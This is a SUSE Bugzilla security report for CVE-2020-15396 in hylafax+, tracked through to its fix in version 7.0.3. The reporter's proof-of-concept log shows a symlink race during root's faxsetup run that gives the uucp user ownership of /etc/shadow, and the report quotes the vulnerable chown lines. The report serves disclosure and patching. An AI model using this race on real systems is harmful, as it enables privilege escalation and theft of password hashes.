Bug 1173521 - (CVE-2020-15396) VUL-0: CVE-2020-15396: hylafax+: Chown as root in user controlled directories allows for privilege escalation
(CVE-2020-15396)
VUL-0: CVE-2020-15396: hylafax+: Chown as root in user controlled directories...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Axel Braun
Security Team bot
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2020-06-30 09:53 UTC by Johannes Segitz
Modified: 2020-09-18 16:50 UTC (History)
3 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Johannes Segitz 2020-06-30 09:53:28 UTC
POC:
sh-5.0$ id
uid=10(uucp) gid=14(uucp) groups=14(uucp),54(lock) context=unconfined_u:unconfined_r:unconfined_t:s0
sh-5.0$ pwd
/var/spool/hylafax/etc
sh-5.0$ ls -l /etc/shadow
-rw-r-----. 1 root shadow 1247 Jun  9 08:46 /etc/shadow
sh-5.0$ /tmp/poc . # now while this poc is running start faxsetup as root
[+] watching .
[+] unlinked access log
[+] added link
-rw-r-----. 1 root shadow 1.3K Jun  9 08:46 /etc/shadow
[+] skipping link setup.tmp
-rw-r-----. 1 root shadow 1.3K Jun  9 08:46 /etc/shadow
[+] added link
-rw-r-----. 1 root shadow 1.3K Jun  9 08:46 /etc/shadow
[+] skipping link Fontmap.HylaFAX
-rw-r-----. 1 root shadow 1.3K Jun  9 08:46 /etc/shadow
[+] added link
-r--r--r--. 1 root shadow 1.3K Jun  9 08:46 /etc/shadow
[+] skipping link setup.cache
-r--r--r--. 1 root shadow 1.3K Jun  9 08:46 /etc/shadow
[+] added link
-r--r--r--. 1 root shadow 1.3K Jun  9 08:46 /etc/shadow
[+] skipping link config
-r--r--r--. 1 uucp shadow 1.3K Jun  9 08:46 /etc/shadow

/etc/shadow is now owned by uucp

The issue is here in setupfax
 2392         $CHOWN $faxUID $CONFIG; $CHGRP $faxGID $CONFIG
 2393         $CHMOD 644 $CONFIG

$CONFIG is created, but in a directory where uucp can unlink it and
exchange it with a symlink to /etc/shadow. Doing this via inotify is 100%
stable on my system.

Indirectly fixed by the changed permissions in
https://sourceforge.net/p/hylafax/HylaFAX+/2534/
Comment 1 Axel Braun 2020-08-11 08:56:26 UTC
I have submitted https://build.opensuse.org/request/show/825727 containing hylafax 7.0.3 - this should contain the remaining fixes
@Johannes - please review and close bug if satisfied
Comment 2 OBSbugzilla Bot 2020-08-11 09:40:20 UTC
This is an autogenerated message for OBS integration:
This bug (1173521) was mentioned in
https://build.opensuse.org/request/show/825731 Factory / hylafax+
https://build.opensuse.org/request/show/825733 15.2 / hylafax+
https://build.opensuse.org/request/show/825734 15.1 / hylafax+
Comment 3 Swamp Workflow Management 2020-08-14 22:14:06 UTC
openSUSE-SU-2020:1209-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1173519,1173521
CVE References: CVE-2020-15396,CVE-2020-15397
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    hylafax+-7.0.3-lp152.3.6.1
Comment 4 Swamp Workflow Management 2020-08-14 22:14:56 UTC
openSUSE-SU-2020:1210-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1173519,1173521
CVE References: CVE-2020-15396,CVE-2020-15397
JIRA References: 
Sources used:
openSUSE Leap 15.1 (src):    hylafax+-7.0.3-lp151.4.6.1
Comment 5 Swamp Workflow Management 2020-08-18 13:15:02 UTC
openSUSE-SU-2020:1231-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1173519,1173521
CVE References: CVE-2020-15396,CVE-2020-15397
JIRA References: 
Sources used:
openSUSE Backports SLE-15-SP1 (src):    hylafax+-7.0.3-bp151.6.4.1
Comment 6 Johannes Segitz 2020-09-09 09:18:58 UTC
fixed, thank you
Comment 7 Swamp Workflow Management 2020-09-18 16:50:49 UTC
openSUSE-SU-2020:1438-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 1173519,1173521
CVE References: CVE-2020-15396,CVE-2020-15397
JIRA References: 
Sources used:
openSUSE Backports SLE-15-SP2 (src):    hylafax+-7.0.3-bp152.3.4.1